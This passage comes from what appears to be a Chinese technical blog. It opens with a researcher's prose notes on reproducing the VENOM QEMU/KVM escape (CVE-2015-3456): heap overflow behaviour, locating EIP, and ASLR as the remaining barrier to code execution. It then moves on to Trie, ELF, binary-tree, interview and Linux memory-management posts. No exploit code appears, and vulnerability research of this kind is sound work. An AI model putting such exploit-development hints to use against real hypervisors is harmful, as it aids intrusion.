<li>poc在虚拟机运行期间只能执行一次,再次开机运行需要重新编译。最开始进行漏洞重现的时候,有的时候能崩溃,有的时候不能,以为eip被覆盖的位置不能准确定位(毕竟溢出heap上再加上ASLR)。后来发现是因为每次运行poc之后,poc里面的内容都会被清0,啥都没有,再次开启虚拟机执行,当然不能成功。所以每次都要重新编译一次。后来想了一下,估计是虚拟机崩溃时候,内核的状态有问题,导致正在运行的进程image会被清空,后来写了个while(1)死循环的test程序执行,然后运行poc,test程序文件果然被清空了,算是验证了猜想。感觉这个确实很棘手,但是并不好解决,想到的一个猥琐方案是,运行poc之前把自己复制一份。</li>
<li>ASLR的问题。感觉只要能够bypass ASLR,剩下ROP链的构造应该问题不大,应该能够达到执行任意代码的目的。所以这个漏洞还是有点厉害。</li>
</ol>
<p>##8. 遇到的问题及解决</p>
<ol>
<li>定位eip。linux方面没写自己手动写过exp,只用过metasploit工具,以前Windows都是Immunity debugger找eip,这里只能用二分法大概试。</li>
<li>试着在heap上部署过shellcode,payload的中间有的字节有时会被覆盖,估计是进程在处理堆的时候,会操作一些数据,以后部署的时候要注意。</li>
</ol>
<p>##9. 参考</p>
<ol>
<li><a href="http://blogs.360.cn/blog/venom-%E6%AF%92%E6%B6%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88qemu-kvm-cve%E2%80%902015%E2%80%903456%EF%BC%89/">VENOM “毒液”漏洞分析(qemu kvm CVE‐2015‐3456)</a></li>
</ol>
<p>顺便说一句360的技术Blog是非常不错的,从上面mj,pjf,wowocock等大牛那里学到很多东西。</p>
<ol>
<li><a href="http://drops.wooyun.org/tips/6597">一步一步学ROP之linux_x86篇</a></li>
</ol>
Trie树与Word Puzzles2014-11-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/11/07/trie-tree-word-puzzles
<p>最近看书遇到一个word puzzles问题,大概的意思就是给定一个字母方阵和一些单词,在这个字母方阵中找出这些单词,可以是横、竖、斜对应的8个方向。比如给出如下的方阵如几个单词(这是一个OJ题):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MARGARITA, ALEMA, BARBECUE, TROPICAL, SUPREMA, LOUISIANA, CHEESEHAM, EUROPA, HAVAIANA, CAMPONESA
</code></pre></div></div>
<p><img src="/assets/img/trie/1.jpg" alt="" /></p>
<p>上面标出了前面3个单词。</p>
<p>最简单的就是暴力匹配了,对每一个单词遍历一下方阵。但是很明显效率受不了,网上学习了一下,Trie树是解决这个问题的很好的方案。下面先简要介绍一下Trie树。</p>
<h3>Trie树简介</h3>
<p>Trie树,又称字典树,单词查找树或者前缀树,是一种用于快速检索的多叉树结构,如英文字母的字典树是一个26叉树,数字的字典树是一个10叉树。Trie典型应用是用于统计和排序大量的字符串(但不仅限于字符串),所以经常被搜索引擎系统用于文本词频统计。它的优点是:最大限度地减少无谓的字符串比较,查询效率比哈希表高。</p>
<p>Trie树可以利用字符串的公共前缀来节约存储空间。如下图所示,该trie树用10个节点保存了6个字符串tea,ten,to,in,inn,int:</p>
<p><img src="/assets/img/trie/2.jpg" alt="" /></p>
<p>Trie树的基本性质可以归纳为:</p>
<ul>
<li>根节点不包含字符,除根节点意外每个节点只包含一个字符。</li>
<li>从根节点到某一个节点,路径上经过的字符连接起来,为该节点对应的字符串。</li>
<li>每个节点的所有子节点包含的字符串不相同。</li>
</ul>
<p>下面给出一个Trie简易实现,根据下面的这幅图代码是很容易理解的。</p>
<p><img src="/assets/img/trie/3.png" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define ALPHABET_SIZE 26
struct node
{
int data;
struct node *link[ALPHABET_SIZE];
};
struct node *create_node()
{
struct node *q = (struct node*)malloc(sizeof(struct node));
for (int i = 0; i < ALPHABET_SIZE; ++i)
{
q->link[i] = NULL;
}
q->data = -1;
return q;
}
void insert_node(struct node* root, char *key)
{
int length = strlen(key);
struct node *q = root;
int i = 0;
for (i = 0; i < length; ++i)
{
int index = key[i] - 'a';
if (q->link[index] == NULL)
{
q->link[index] = create_node();
}
q = q->link[index];
}
q->data = i;
}
int search(struct node *root, char *key)
{
struct node *q = root;
int length = strlen(key);
int i = 0;
for (i = 0; i < length; ++i)
{
int index = key[i] - 'a';
if (q->link[index] != NULL)
q = q->link[index];
else
break;
}
if (key[i] == '\0' && q->data != -1)
return q->data;
return -1;
}
void del(struct node *root)
{
if(root == NULL)
return;
for (int i = 0; i < ALPHABET_SIZE; ++i)
{
del(root->link[i]);
}
free(root);
}
int main()
{
struct node *root = create_node();
insert_node(root, "by");
insert_node(root, "program");
insert_node(root, "programming");
insert_node(root, "data structure");
insert_node(root, "coding");
insert_node(root, "code");
printf("Search value:%d\n", search(root, "code"));
printf("Search value:%d\n", search(root, "geeks"));
printf("Search value:%d\n", search(root, "coding"));
printf("Search value:%d\n", search(root, "programming"));
del(root);
}
</code></pre></div></div>
<h3>Word Puzzles</h3>
<p>主要思想就是先将单词建立起一颗Trie树,接着对字符方阵中的每个字符、每个方向进行暴力搜索,查找其是否存在于这颗Trie树中。因为个人不太喜欢用全局变量,就用C++写的,有一些C++11代码,还是觉得C++11代码太风骚。</p>
<p>输入如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>20 20 10
QWSPILAATIRAGRAMYKEI
AGTRCLQAXLPOIJLFVBUQ
TQTKAZXVMRWALEMAPKCW
LIEACNKAZXKPOTPIZCEO
FGKLSTCBTROPICALBLBC
JEWHJEEWSMLPOEKORORA
LUPQWRNJOAAGJKMUSJAE
KRQEIOLOAOQPRTVILCBZ
QOPUCAJSPPOUTMTSLPSF
LPOUYTRFGMMLKIUISXSW
WAHCPOIYTGAKLMNAHBVA
EIAKHPLBGSMCLOGNGJML
LDTIKENVCSWQAZUAOEAL
HOPLPGEJKMNUTIIORMNC
LOIUFTGSQACAXMOPBEIO
QOASDHOPEPNBUYUYOBXB
IONIAELOJHSWASMOUTRK
HPOIYTJPLNAQWDRIBITG
LPOINUYMRTEMPTMLMNBO
PAFCOPLHAVAIANALBPFS
MARGARITA
ALEMA
BARBECUE
TROPICAL
SUPREMA
LOUISIANA
CHEESEHAM
EUROPA
HAVAIANA
CAMPONESA
</code></pre></div></div>
<p>20表示方阵大小,10表示单词大小</p>
<p>输出:坐标+方向</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0 15 G
2 11 C
7 18 A
4 8 C
16 13 B
4 15 E
10 3 D
5 1 E
19 7 C
11 11 H
</code></pre></div></div>
<p>下面是代码</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <fstream>
#include <vector>
#include <algorithm>
#include <iterator>
#include <string>
#include <tuple>
using namespace std;
struct Node
{
int data;
struct Node *child[26];
};
class WordPuzzles
{
public:
WordPuzzles(ifstream &in);
void insert_node(string word, int num);
void search_words(int x, int y, int dir);
void do_work();
private:
Node *create_node()
{
Node *q = new Node();
q->data = -1;
for (int i = 0; i < 26; ++i)
{
q->child[i] = NULL;
}
return q;
}
static int dx[8];//方向
static int dy[9];
int row, col, counts;
vector<string> wordmap, words;
vector<tuple<int, int, int, char>> ans;
Node *root;
};
int WordPuzzles::dx[] = { -1, -1, 0, 1, 1, 1, 0, -1 };
int WordPuzzles::dy[] = { 0, 1, 1, 1, 0, -1, -1, -1 };
WordPuzzles::WordPuzzles(ifstream &in)
{
in >> row >> col >> counts;
printf("the row is:%d,col is:%d,counts is:%d\n", row, col, counts);
for (int i = 0; i < row; ++i)
{
string str;
in >> str;
wordmap.push_back(str);
}
cout << "the map is " << endl;
copy(wordmap.begin(), wordmap.end(), ostream_iterator<string>(cout, "\n"));
for (int i = 0; i < counts; ++i)
{
string str;
in >> str;
words.push_back(str);
}
cout << "the words is " << endl;
copy(words.begin(), words.end(), ostream_iterator<string>(cout, "\n"));
root = create_node();
for (vector<string>::iterator it = words.begin(); it != words.end(); ++it)
{
insert_node(*it, it - words.begin());
}
}
void WordPuzzles :: insert_node(string word, int num)
{
Node *q = root;
for (int i = 0; i < word.size(); ++i)
{
int index = word[i] - 'A';
if (q->child[index] == NULL)
{
q->child[index] = create_node();
}
q = q->child[index];
}
q->data = num;
}
void WordPuzzles::search_words(int x,int y,int dir)
{
Node *q = root;
int xtmp = x, ytmp = y;
while (xtmp >= 0 && xtmp < row && ytmp >= 0 && ytmp < col)
{
if (!q->child[wordmap[xtmp][ytmp] - 'A'])
break;
else
q = q->child[wordmap[xtmp][ytmp] - 'A'];
if (q->data != -1)
{
ans.push_back(make_tuple(q->data,x, y, dir));
q->data = -1;
}
xtmp += dx[dir];
ytmp += dy[dir];
}
}
void WordPuzzles::do_work()
{
for (int i = 0; i < row; ++i)
{
for (int j = 0; j < col; ++j)
{
for (int k = 0; k < 8; ++k)
search_words(i, j, k);
}
}
sort(ans.begin(), ans.end(),
[](const tuple<int, int, int, char>& a, const tuple<int, int, int, char> &b)
{
return get<0>(a) < get<0>(b);
});
for (auto &it : ans)
{
cout << get<1>(it) << " " << get<2>(it) << " " << (char)(get<3>(it) +'A') << endl;
}
}
int main()
{
ifstream in("word.txt");
WordPuzzles wp(in);
wp.do_work();
}
</code></pre></div></div>
ELF文件格式简介2014-11-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/11/02/elf
<p>ELF代表Executable and Linkable Forma,是一种对可执行文件、目标文件和库使用的文件格式,跟Windows下的PE文件格式类似。ELF格式是是UNIX系统实验室作为ABI(Application Binary Interface)而开发和发布的,早已经是Linux下的标准格式了。
本文使用如下的简单程序来具体讲述ELF文件的格式,建议对照着程序的二进制码阅读本文。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
int add(int a,int b)
{
printf("Number are added together\n");
return a + b;
}
int main()
{
int a,b;
a = 3;
b = 4;
int ret = add(a,b);
printf("Result:%u\n",ret);
exit(0);
}
gcc test.c -o test
gcc test.c -c -o test.o
</code></pre></div></div>
<h3>一. ELF概述</h3>
<p>ELF主要包括三种类型文件:</p>
<ul>
<li>可重定位文件(relocatable):编译器和汇编器产生的.o文件,被Linker所处理</li>
<li>可执行文件(executable):Linker对.o文件进行处理输出的文件,进程映像</li>
<li>共享对象文件(shared object):动态库文件.so</li>
</ul>
<p>下面是三种类型的示例:</p>
<p><img src="/assets/img/elf/1.png" alt="" /></p>
<p>ELF的布局如下:</p>
<p><img src="/assets/img/elf/2.png" alt="" /></p>
<p>由图可以知道,ELF文件从概念上来说包括了5个部分:</p>
<ul>
<li>
<p>ELF header,描述体系结构和操作系统等基本信息,指出section header table和program header table在文件的位置</p>
</li>
<li>
<p>program header table,这个是从运行的角度来看ELF文件的,主要给出了各个segment的信息,在汇编和链接过程中没用</p>
</li>
<li>
<p>section header table,这个保存了所有的section的信息,这是从编译和链接的角度来看ELF文件的</p>
</li>
<li>
<p>sections,就是各个节区</p>
</li>
<li>
<p>segments,就是在运行时的各个段</p>
</li>
</ul>
<p>注意,经过上面解释我们可以看到,其实sections和segments占的一样的地方。这是从链接和加载的角度来讲的。左边是链接视图,右边是加载视图,sections是程序员可见的,是给链接器使用的概念,而segments是程序员不可见的,是给加载器使用的概念。一般是一个segment包含多个section。Windows的PE就没有这个program header table和section header table点都统一为section,只是在加载时会进行处理。所以program header table和section header table都是可选的。</p>
<h3>二. ELF的组成结构</h3>
<p>在介绍这部分之前,前把定义中的各个类型数据结构的大小放在这里。</p>
<p><img src="/assets/img/elf/3.png" alt="" /></p>
<h4>(1) ELF header</h4>
<p>ELF Header描述了体系结构和操作系统等基本信息,并指出Section Header Table和Program Header Table在文件中的什么位置,每个成员的解释参见注释。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define EI_NIDENT 16
typedef struct{
/*ELF的一些标识信息,固定值*/
unsigned char e_ident[EI_NIDENT];
/*目标文件类型:1-可重定位文件,2-可执行文件,3-共享目标文件等*/
Elf32_Half e_type;
/*文件的目标体系结构类型:3-intel 80386*/
Elf32_Half e_machine;
/*目标文件版本:1-当前版本*/
Elf32_Word e_version;
/*程序入口的虚拟地址,如果没有入口,可为0*/
Elf32_Addr e_entry;
/*程序头表(segment header table)的偏移量,如果没有,可为0*/
Elf32_Off e_phoff;
/*节区头表(section header table)的偏移量,没有可为0*/
Elf32_Off e_shoff;
/*与文件相关的,特定于处理器的标志*/
Elf32_Word e_flags;
/*ELF头部的大小,单位字节*/
Elf32_Half e_ehsize;
/*程序头表每个表项的大小,单位字节*/
Elf32_Half e_phentsize;
/*程序头表表项的个数*/
Elf32_Half e_phnum;
/*节区头表每个表项的大小,单位字节*/
Elf32_Half e_shentsize;
/*节区头表表项的数目*/
Elf32_Half e_shnum;
/*某些节区中包含固定大小的项目,如符号表。对于这类节区,此成员给出每个表项的长度字节数。*/
Elf32_Half e_shstrndx;
}Elf32_Ehdr;
</code></pre></div></div>
<p>这里简单解释一下最后一个字段e_shstrndx的含义,“e_shstrndx”是Elf32_Ehdr的最后一个成员,它是“Section header string table index”的缩写。我们知道段表字符串表本身也是ELF文件中的一个普通的段,知道它的名字往往叫做“.shstrtab”。那么这个“e_shstrndx”就表示“.shstrtab”在段表中的下标,即段表字符串表在段表中的下标。</p>
<p>下面是test的ELF header结构各个数据成员对应的值:</p>
<p><img src="/assets/img/elf/4.png" alt="" /></p>
<p>可以看到这个ELF的基本信息,比如,体系结构和操作系统,Section header table中有30个section,从4420开始,每个40个字节,Program header table中有9个segment,每个32字节。下面再从字节码上面看看具体的。标出了某些结构,可以对照上面的结构看。</p>
<p><img src="/assets/img/elf/5.png" alt="" /></p>
<h4>(2) program header table与grogram header entry</h4>
<p>程序头表是从加载的角度来看ELF文件的,目标文件没有该表,每一个表项提供了各段在虚拟地址空间和物理地址空间的大小、位置、标志、访问权限和对其方面的信息。从上面知道,test中有9个segment,如下图:</p>
<p><img src="/assets/img/elf/6.png" alt="" /></p>
<p>下面对其中的一些进行简单的介绍。</p>
<ul>
<li>PHDR保存程序头表</li>
<li>INTERP指定在程序已经从可执行文件映射到内存之后,必须调用的解释器。在这里,解释器并不意味着二进制文件的内容必须由另一个程序解释。它指的是这样一个程序:通过链接其他库,来满足未解决的引用。通常/lib/ld-linux.so.2、/lib/ld-linux-ia-64.so.2等库,用于在虚拟地址空间中插入程序运行所需要的动态库。对几乎所有的程序来说,可能C标准库都是必须映射的。还需要添加的各种库包括,GTK、数学库、libjpeg等等</li>
<li>LOAD表示一个需要从二进制文件映射到虚拟地址空间的段。其中保存了常量数据(如字符串),程序的目标代码等。</li>
<li>DYNAMIC段保存了由动态链接器(即,INTERP中指定的解释器)使用的信息。</li>
<li>NOTE保存了专有信息</li>
</ul>
<p>一个entry对应一个segment,由如下的数据结构表示</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct
{
/*segment的类型:PT_LOAD= 1 可加载的段*/
Elf32_Word p_type;
/*从文件头到该段第一个字节的偏移*/
Elf32_Off p_offset;
/*该段第一个字节被放到内存中的虚拟地址*/
Elf32_Addr p_vaddr;
/*在linux中这个成员没有任何意义,值与p_vaddr相同*/
Elf32_Addr p_paddr;
/*该段在文件映像中所占的字节数*/
Elf32_Word p_filesz;
/*该段在内存映像中占用的字节数*/
Elf32_Word p_memsz;
/*段标志*/
Elf32_Word p_flags;
/*p_vaddr是否对齐*/
Elf32_Word p_align;
} Elf32_phdr;
</code></pre></div></div>
<h4>(3) section header table与section header entry</h4>
<p>节表头包含了文件中的各个节,每个节都指定了一个类型,定义了节数据的语义。各节都指定了大小和在二进制文件内部的偏移。从上面知道,test中有30个section,如下图:</p>
<p><img src="/assets/img/elf/7.png" alt="" /></p>
<p>下面对其中的一些进行简单的介绍:</p>
<ul>
<li>.interp保存了解释器的文件名,这是一个ASCII字符串</li>
<li>.data保存初始化的数据,这是普通程序数据一部分,可以再程序运行时修改</li>
<li>.rodata保存了只读数据,可以读取但不能修改。例如,编译器将出现在printf语句中的所有静态字符串封装到该节</li>
<li>.init和.fini保存了进程初始化和结束所用的代码,这两个节通常都是由编译器自动添加</li>
<li>.gnu.hash是一个散列表,允许在不对全表元素进行线性搜索的情况下,快速访问所有的符号表项</li>
</ul>
<p>section的结构定义如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct{
/*节区名称*/
Elf32_Word sh_name;
/*节区类型:PROGBITS-程序定义的信息,NOBITS-不占用文件空间(bss),REL-重定位表项*/
Elf32_Word sh_type;
/*每一bit位代表一种信息,表示节区内的内容是否可以修改,是否可执行等信息*/
Elf32_Word sh_flags;
/*如果节区将出现在进程的内存影响中,此成员给出节区的第一个字节应处的位置*/
Elf32_Addr sh_addr;
/*节区的第一个字节与文件头之间的偏移*/
Elf32_Off sh_offset;
/*节区的长度,单位字节,NOBITS虽然这个值非0但不占文件中的空间*/
Elf32_Word sh_size;
/*节区头部表索引链接*/
Elf32_Word sh_link;
/*节区附加信息*/
Elf32_Word sh_info;
/*节区带有地址对齐的约束*/
Elf32_Word sh_addralign;
/*某些节区中包含固定大小的项目,如符号表,那么这个成员给出其固定大小*/
Elf32_Word sh_entsize;
}Elf32_Shdr;
</code></pre></div></div>
<p>这就是ELF的大致结构了,有时间再对几个比较重要的节表进行总结。</p>
遍历序列确定二叉树2014-10-30T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/30/binary-tree-traversals
<p>我们知道二叉树的遍历一般分为三种(前序、中序、后序),现在的问题是根据任意两种遍历序列确定这颗二叉树。一般的,“前序+中序”,“中序+后序”的模式都能唯一确定二叉树,而“前序+后序”是不能唯一确定二叉树的。<a href="http://www.binarythink.net/2012/12/binary-tree-info-theory/">这篇文章</a>从信息论的角度从定性的角度说明了这个问题。(下面大部分都是从网上看来的,自己做了一个综合而已)</p>
<p>下面我们对这三种情况分别进行讨论。</p>
<p>一. 已知二叉树的前序序列和中序序列</p>
<p>1、确定树的根节点。树根是当前树中所有元素在前序遍历中最先出现的元素。</p>
<p>2、求解树的子树。找出根节点在中序遍历中的位置,根左边的所有元素就是左子树,根右边的所有元素就是右子树。若根节点左边或右边为空,则该方向子树为空;若根节点左边和右边都为空,则根节点已经为叶子节点。</p>
<p>3、递归求解树。将左子树和右子树分别看成一棵二叉树,重复1、2、3步,直到所有的节点完成定位。</p>
<p>二、已知二叉树的后序序列和中序序列</p>
<p>1、确定树的根。树根是当前树中所有元素在后序遍历中最后出现的元素。</p>
<p>2、求解树的子树。找出根节点在中序遍历中的位置,根左边的所有元素就是左子树,根右边的所有元素就是右子树。若根节点左边或右边为空,则该方向子树为空;若根节点左边和右边都为空,则根节点已经为叶子节点。</p>
<p>3、递归求解树。将左子树和右子树分别看成一棵二叉树,重复1、2、3步,直到所有的节点完成定位。</p>
<p>下面是代码</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include "stdafx.h"
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
typedef struct _node
{
int v;
struct _node* left;
struct _node* right;
}node;
char pre[50] = "ABDHLEKCFG";
char mid[50] = "HLDBEKAFCG";
char post[50] = "LHDKEBFGCA";
int Possition(char c)
{
return strchr(mid,c) - mid;
}
node* root1;//这里弄成全局变量主要是为了调试
node* root2;
//i: 子树的前序序列字符串的首字符在pre[]中的下标
//j: 子树的中序序列字符串的首字符在mid[]中的下标
//len: 子树的字符串序列的长度
void PreMidCreateTree(node **root,int i,int j,int len)
{
int m;
if(len <= 0)
return;
*root = (node*)malloc(sizeof(node));
(*root)->v = pre[i];
(*root)->left = NULL;
(*root)->right = NULL;
m = Possition(pre[i]);
PreMidCreateTree(&((*root)->left),i+1,j,m-j);//确定递归区间要非常注意,仔细体会
PreMidCreateTree(&((*root)->right),i+(m-j)+1,m+1,len-1-(m-j));
}
//i: 子树的后序序列字符串的尾字符在post[]中的下标
//j: 子树的中序序列字符串的首字符在mid[]中的下标
//len: 子树的字符串序列的长度
void MidPostCreateTree(node **root,int i,int j,int len)
{
int m;
if(len <= 0)
return;
*root = (node*)malloc(sizeof(node));
(*root)->v = post[i];
(*root)->left = NULL;
(*root)->right = NULL;
m = Possition(post[i]);
MidPostCreateTree(&((*root)->left),i-1-(len-1-(m-j)),j,m-j);
MidPostCreateTree(&((*root)->right),i-1,m+1,len-1-(m-j));
}
void PreOrder(node *root)
{
if(root)
{
printf("%c",root->v);
PreOrder(root->left);
PreOrder(root->right);
}
}
void PostOrder(node *root)
{
if(root)
{
PostOrder(root->left);
PostOrder(root->right);
printf("%c",root->v);
}
}
int main()
{
node *root2= NULL;
PreMidCreateTree(&root1, 0, 0, strlen(mid));
PostOrder(root1);
printf("\n");
MidPostCreateTree(&root2, strlen(post)-1, 0, strlen(mid));
PreOrder(root2);
printf("\n");
return 0;
}
</code></pre></div></div>
<p>三. 已知二叉树的前序序列和后序序列</p>
<p>这种情况下一般不能唯一确定一颗二叉树,但是可以确定有多少种二叉树的可能形态。</p>
<p>思路如下:我们先看一个简单例子,前序序列为ABCD,后序序列为CBDA</p>
<p>(1) 前序遍历和后序遍历的最后一个字母必定是根,即都是 A</p>
<p>(2) 前序遍历的第二个字母是 B 也必定是某颗子树的根(左右无法确定)。那么 B 在后序遍历中一定出现在它所在子树的最后,因此我们可以通过查找 B 在后序遍历中的位置来得到左子树的所有节点,即为 B 和 C ,剩下的 D 就是右子树的节点了</p>
<p>(3) 分别用同样的方法分析左子树 BC 及右子树 D , D 只有一个根,形态是唯一的, BC 只有一颗子树,它可以是左也可以是右</p>
<p>(4) 最后看看有多少个节点(假设是 n )是只有一颗子树的,用乘法 pow (2,n)就是结果</p>
<p>下面推广到所有的二叉树</p>
<p>首先我们需要设几个变量:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pre[50]; // 前序遍历的数组
post[50]; // 后序遍历的数组
length; // 数组的长度
count; // 记录只有一个子树的节点的个数
</code></pre></div></div>
<p>(1) 如果 length == 1 ,显然结果唯一</p>
<p>(2) 当顶点多余 1 时,说明存在子树,必然有 pre[0]==post[length-1]; 如果 pre[1] == post[length-2]; 说明从 1 到 length-1 都是 PreStr[0] 的子树,至于是左还是右就无法确定,此时 count++ 。对剩下的 pre[1] 到 pre[length-1] 与 post[0] 到 post[length-2] 作为一颗新树进行处理</p>
<p>(3) 如果 pre[1] != post[length-2], 显然存在左右子树 (post 中以与 pre[1] 相等的位置分为左右子树 ) ,对左右子树分别作为一颗独立的子树进行处理</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
char pre[50];//= "ABDHLEKCFG";
char mid[50];//= "HLDBEKAFCG";
char post[50];//= "LHDKEBFGCA";
int count;
void calc(int prebeg,int preend,int postbeg,int postend)
{
int i;
if(prebeg>=preend)
return;
for(i = postbeg; i <= postend - 1; ++i)
{
if(pre[prebeg+1]==post[i])
break;
}
if(i == postend - 1)
count++;
calc(prebeg+1,prebeg+1+(i-postbeg),postbeg,i);
calc(prebeg+1+(i-postbeg)+1,preend,i+1,postend-1);
}
int Pow(int n)
{
int i;
int m = 1;
for(i = 0; i < n; i++)
{
m *= 2;
}
return m;
}
int main()
{
int length;
scanf("%s", pre);
scanf("%s", post);
length = strlen(pre);
count = 0;
calc(0,length-1,0,length-1);
printf("%d\n", Pow(count));
return 0;
}
</code></pre></div></div>
Intel和VMware应聘小记2014-10-29T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/10/29/bishimianshi
<p>上周二(10.21)回学校,路过校门口偶然一瞥看到Intel的笔试通知,说带上中英文简历就可以,然后想着明年就工作可以先去看看。知道外企都有长期的实习招聘,说不定混个实习呢。</p>
<p>Intel的笔试人很少,估计是因为招的人少没怎么做宣传的缘故。笔试题是中文的,很基础,很明显就是底层的,纯C,系统ring 0 ring 3等简单常识,,基本的算法题,附加题是英文的也简单。第二天很顺利的去面试,结果面试官对虚拟化这块不熟,我就跟他给他讲Xen、KVM讲了好久。他好像对漏洞利用比较有兴趣,又从Windows漏洞利用与对抗讲起。他后来来一句”操作系统“我就不问你了啊”,我说“随意吧”。整个过程还是表现出满满的自信的。他对我还是挺满意的,直接就说拿个intern没问题,然后跟manager说了一下我的情况,manager想跟我整了段英文,我这个口语真是要了命。还好是技术的,勉强过了。临走,manager说有合适的intern通知我,我想着可能没戏了,我实在是我的英语口语没什么信心。结果第二天就来了Intel那边hr就来了通知。马来西亚,大连,上海都来了电话,当时想着这个外企还真是挺麻烦的。后来知道上海那个是manager,她问了我为什么这么早(我说明年才能过去),还说她们是有校招名额的。这个Intel真是挺有效率的,周二笔试,周三笔试,周四发通知,剩下的就是走流程,这么早,体检都给我安排好了。基本上实习就定在Intel了吧。</p>
<p>下面再说说VMware,这个公司我一直是很看好的。作为云计算的底层平台,我对虚拟化技术在今后几年的发展非常看好。去年就参加了VMware的校园招聘,因为才研一,不管是工作还是实习都不可能,打着酱油进了2面,坦诚自己非应届,也不能实习,面试官也没怎么说我,让我以后实习可以去试试。VMware的笔试全英文,比较全面,也比较有难度,比如今年还考了shellshock漏洞。当然,因为内功还行,前面选择部分还行,这次就有2个编程题不会。以为跪在笔试上了,结果周一通知今天去面试。今天去面试情况挺糟糕的,这也是促使我写下这篇文章的原因。感觉上午就像没有清醒一样,一个memcpy竟然没有检查NULL指针,我也是醉了。我说做过windows kernel driver的开发,结果面试官以来就问,Windows的启动流程。我又是支支吾吾,确实是有点忘了,并且我之前的工作是偏向于安全的,对这个确实没怎么自习看。一上来就感觉不太好了。之后让我解释内核NULL Pointer的原因,我也是说得不太仔细,就连异常发生时候,error code压栈里面有一位表示异常发生的位置(内核态/用户态)这个都说得不够自信。总之吧,整个面试感觉自己表现得非常不好,算是这么多年面试最差的一次。VMware估计是跪了,想起去年一面、二面充满自信的自己,真的是挺大一讽刺。</p>
<p>这两次面试一个顺利得超乎我想象,一个狼狈得超乎想象。顺利的就不说了,狼狈的VMware告诉我还是要好好做好准备,这些年的努力并没有白费,不过要善于表达。我觉得挺好的,在我觉得什么都很顺的情况下,来这么一次。恩,继续加油。</p>
Linux内存管理概述2014-10-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/12/linux-vm-overview
<h3>一. Linux内核地址空间划分</h3>
<p>Linux操作系统将虚拟地址空间4G中低3G是分给用户进程使用,高1G分给内核使用。虽然(在两个用户进程之间的)上下文切换期间会改变低地址部分,但是高地址空间的内核部分总是保持不变。MMU在进行寻址的时候都是使用的虚拟地址,内核当然也不例外。Linux为了简单,将物理内存0开始的部分内存直接映射到了它的虚拟地址开始的地方,也就是0xc0000000,这样做是很方便的,在内核中使用0xc0000001就相当于物理访问物理单元1。但是,这样问题就来了,内核只能直接寻址1G的虚拟地址空间,即使是全部映射完,也只能访问1G物理内存。所以如果一个系统有超过1G的物理内存,在某一时刻,必然有一部分内核是无法直接访问到的。另外,内核除了访问内存外,还需要访问很多IO设备。在现在的计算机体系结构下,这些IO设备的资源(比如寄存器,片上内存等)一般都是通过MMIO的方式映射到物理内存地址空间来访问的,就是说内核的1G地址空间除了映射内存,还要考虑到映射这些IO资源,换句话说,内核还需要预留出一部分虚拟地址空间用来映射这些IO设备。考虑到这些特殊用途,Linux内核只允许直接映射896M的物理内存,而预留了最高端的128M虚拟地址空间另作他用。所以当系统有大于896M内存时,超过896M的内存时,内核就无法直接访问到了,这部分内存就是所谓的高端内存(high memory)。那内核就永远无法访问到超过896M的内存了?当然不适合,内核已经预留了128M虚拟地址,我们可以用这个地址来动态的映射到高端内存,从而来访问高端内存。所以预留的128M除了映射IO设备外,还有一个重要的功能是提供了一种动态访问高端内存的一种手段。当然,在系统物理内存<896M,比如只有512M的时候,就没有高端内存了,因为512M的物理内存都已经被内核直接映射。事实上,在物理内存<896M时,从3G+max_phy ~ 4G的空间都作为上述的预留的内核地址空间。ULK上来第二章就直接出来896M内核页表很是让人迷惑,只有搞清楚了高端内存的概念才能完全理解。需要注意的是,只有内核自身使用高端内存页,对用户空间进程来说,高端页和普通内存页完全没有区别,用户空间进程总是通过页表访问内存,而不是直接访问。下图展示的是内核地址的空间划分。</p>
<p><img src="/assets/img/vmoverview/1.png" alt="" /></p>
<p>PAGE_OFFSET即是0xc0000000,前面物理内存896M是直接映射到内核地址空间,之后的就是高端内存了,高端内存划分为3部分:VMALLOC_START~VMALLOC_END、KMAP_BASE~FIXADDR_START和FIXADDR_START~4G。
对 于高端内存,可以通过 alloc_page() 或者其它函数获得对应的 page,但是要想访问实际物理内存,还得把 page 转为线性地址才行,也就是说,我们需要为高端内存对应的 page 找一个线性空间,这个过程称为高端内存映射,这个我们第三节再讲。</p>
<h3>二. 页框与内存区简介</h3>
<p>页框是Linux内存管理的最小的单位,就是一个4KB的内存区。页框的信息都存放在一个类型为page的页描述符中,所有的页描述符存放在mem_map数组中。注意这是对所有物理内存而言的。整个内存划分为结点(node),每个结点关联到系统中的一个处理器,在内核中表示为pg_data_t的实例。各个结点又划分为内存域(zone),这是内存的进一步细分。大致结构如下:</p>
<p><img src="/assets/img/vmoverview/2.png" alt="" /></p>
<p>Linux把每个内存结点的物理内存划分为3个管理区,ZONE_DMA、ZONE_NORMAL、ZONE_HIGHMEM。其范围分别为:</p>
<table>
<thead>
<tr>
<th style="text-align: left">字段名</th>
<th style="text-align: left">说明</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">ZONE_DMA</td>
<td style="text-align: left">低于16MB的内存页框</td>
</tr>
<tr>
<td style="text-align: left">ZONE_NORMAL</td>
